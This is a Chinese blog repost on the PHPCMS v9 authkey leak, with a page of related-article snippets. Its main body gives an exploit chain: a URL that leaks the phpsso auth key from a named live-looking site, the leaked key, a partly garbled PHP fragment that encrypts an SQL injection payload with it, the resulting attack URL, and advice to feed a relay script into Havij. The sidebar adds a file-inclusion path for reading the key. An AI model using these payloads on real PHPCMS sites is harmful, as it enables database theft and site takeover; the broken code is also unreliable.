php获得auth_key漏洞,phpcmsv9 authkey泄露导致SQL注入漏洞 | CN-SEC 中文网

最新推荐文章于 2023-09-11 17:53:44 发布
最新推荐文章于 2023-09-11 17:53:44 发布
阅读量410 收藏
点赞数
文章标签: php获得auth_key漏洞

好久没有关注phpcms了,最近老是有朋友问我关于phpcms的问题,网上找了一下,目前问题比较严重的就是这个authkey泄露导致sql注入拿shell的了,先转些介绍文章吧,exp稍候写出来了再发,请及时关注本人博客。。。

首先请看乌云上面的大牛分析的文章:

http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V

20150717125650281.png

phpsso_auth_key: 0tagvqnxuq1x8x4jvaziib7yx4e9ibnl

使用authkey加密payload:

0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

}

}

echo sys_auth("action=synlogin&uid=1' and updatexml(1,concat('~',user()),1)#", 'ENCODE', '0tagvqnxuq1x8x4jvaziib7yx4e9ibnl');

http://www.2cto.com/api.php?op=phpsso&code=6f56BQgIUVQDVAkGUwEFCgwDAwNSAVBdA1UHD1RSURFZDlgIS0EPCFwDUFhFFl1dCBMWVlkHE0xDUFJDBktfCRhQGlZXVgIFR0weSERPQUpQRh4eHk8CEBA

201507171301114.png

看到有人说是phpcms authkey 无法注入。于是噌噌噌的搞了一个中转的脚本

0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

}

}

?>

使用的办法就是填写目标的www还有key。然后丢到havij里面跑就好了

20150717131846689.png

201507171320043.png

weixin_39853892
关注
php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证
10-22
主要介绍了php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证的方法,结合实例形式分析了PHP使用Header函数调用登录验证及PHP_AUTH_PW和PHP_AUTH_USER进行验证处理的相关技巧,需要的朋友可以参考下
php sys auth,phpcms_v9 authkey注入
weixin_34109083的博客
03-13 227
[PHP] 纯文本查看 复制代码
phpcms漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 3720
xxxxxxxxxxx
phpcms authkey生成算法问题导致authkey泄露
草巾冒小子的博客
06-12 6483
关于phpcms authkey生成算法问题导致authkey泄露的修复问题 简介: 漏洞名称:phpcms authkey生成算法问题导致authkey泄露 补丁文件:caches/configs/system.php 补丁来源:云盾自研 漏洞描述:phpcms在安装时,由于在同一个页面中连续使用mt_rand(),未进行有效mt_srand();种子随机化操...
php sys auth,PHPCMSV9 AuthKey泄露导致注入EXP
weixin_42512096的博客
03-13 551
天小站发布了PHPCMSV9 AuthKey泄露导致SQL注入的文章,熟悉本站的兄弟们都知道,今天可能就会发布EXP了,恭喜你,又猜对了。好久没有写PHP版的EXP了,这次再写就已经基本忘光了,唉,花了好久的时间呀,最终还是完成了。其实使用昨天的那个中转脚本已经完全够用了,今天发布的这个是给懒人用的,先给个图吧。。。...
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1545
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
PyPI 官网下载 | pyams_auth_http-1.1.1-py3-none-any.whl
02-07
标题 "PyPI 官网下载 | pyams_auth_http-1.1.1-py3-none-any.whl" 提供的信息表明这是一个与Python相关的库,它可以从Python Package Index(PyPI)上下载。PyPI是Python社区广泛使用的软件仓库,开发者可以在这里...
spring-android-basic-auth.zip_android_spring_spring auth_spring-
09-20
标题中的"spring-android-basic-auth.zip"表明这是一个关于Spring在Android平台上的基本认证(Basic Authentication)的应用示例。Spring是一个广泛使用的Java开发框架,而Spring Android是Spring为Android平台提供...
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注入漏洞
PHPCMS phpsso_auth_key泄露导致注入 测试环境9.6.0版本,其他版本未具体测试
weixin_35771144的博客
03-06 1133
  获取key   通过文件包含漏洞读取phpsso_auth_key (9.5.7中招,v9.6.0没有此漏洞): /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches...
phpcmsv9 authkey泄露导致SQL注入漏洞
weixin_30301183的博客
03-05 936
phpcmsv9 authkey泄露导致SQL注入漏洞 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJX...
php获得auth_key漏洞,phpcms v9漏洞:authkey中转注入漏洞
weixin_39927993的博客
04-02 432
set_time_limit(0);$wang_url = 'http://www.adminwl.com';$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str = "uid=1".stripslashes($_GET['id']);$encode = sys_auth($str, 'ENCODE', $auth_key);$content = file...
PHPCMS authkey泄露导致注入 影响版本<=9.6.1
weixin_35771144的博客
03-05 694
漏洞详情   install/install.php 184行 if($module == 'admin') { $cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').''; $authkey = random(20, '1294567890abcdefghigklm...
PHPCMS v9.6.0 wap模块SQL注入
systemino的博客
05-10 793
一、漏洞详情 phpcms v9.6.0 sys_auth 在解密参数后未进行适当校验造成 sql injection。 看下漏洞的关键点,漏洞最终触发 SQL 注入的点是位于 phpcms/modules/content/down.php 的 init 函数中: 在这个函数中,我们可以看到通过 GET 传参 a_k 参数的值,然后调用 sys_auth 方法并传参 DECODE 进行了...
php获得auth_key漏洞,PHPCMS authkey泄露导致注入
weixin_34644072的博客
04-02 1000
发布时间:2017-04-28公开时间:N/A漏洞类型:sql注入危害等级:高漏洞编号:xianzhi-2017-04-93356191测试版本:N/A漏洞详情install/install.php 184行if($module == 'admin') {$cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUV...
phpsso.php 注入漏洞,PHPCMS V9 /phpsso_server/phpcms/modules/phpsso/index.php SQL注入漏洞
weixin_32286661的博客
03-13 776
/api/get_menu.phpfunction ajax_getlist() {$cachefile = $_GET['cachefile'];$cachefile = str_replace(array('/', '//'), '', $cachefile);//$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S',...
phpcms获取auth_key漏洞
收集盒 Book box
08-21 2805
1.  为所欲为漏洞: 注册登录后访问 http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1 查看源文件:     拿到这个:        aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0d
nacos_auth_identity_key
最新发布
09-17
nacos_auth_identity_key是Nacos身份验证模块中的一个关键参数,用于标识身份验证的密钥。 在Nacos中,身份验证是指通过一定的机制来验证用户的身份,确保只有经过授权的用户可以进行相应的操作。nacos_auth_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值